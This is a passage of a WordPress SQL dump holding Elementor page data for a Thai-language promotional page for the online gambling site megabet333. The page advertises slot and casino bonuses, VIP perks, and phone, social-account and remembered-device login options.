\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1062,136,'_thumbnail_id','60'),(1063,136,'_elementor_edit_mode','builder'),(1064,136,'_elementor_template_type','wp-page'),(1065,136,'_elementor_version','3.32.5'),(1066,136,'_elementor_pro_version','3.32.3'),(1067,136,'_wp_page_template','default'),(1068,136,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1069,136,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 